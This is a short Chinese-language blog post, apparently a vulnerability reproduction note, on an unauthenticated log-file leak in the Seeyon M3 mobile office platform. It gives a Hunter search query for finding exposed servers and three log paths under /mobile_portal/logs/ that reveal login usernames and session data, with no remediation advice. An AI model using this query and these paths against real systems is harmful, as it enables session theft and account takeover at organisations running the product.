Babing
Published on 2024-08-30 / 2 Visits
0
0

Z5-1致远互联-M3移动智能办公平台-InformationLeakage

Z5-1致远互联-M3移动智能办公平台-InformationLeakage

漏洞描述:

致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。 在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。

网站图片:

image.webp

网络测绘:

Hunter 语法:

hunterweb.icon==“657d4895205951cbea6396701b194c30”

漏洞复现:

payload:

/mobile_portal/logs/autoLogin.log

效果图:
image.webp

/mobile_portal/logs/app.log

image.webp

/mobile_portal/logs/requset.log

image.webp


Comment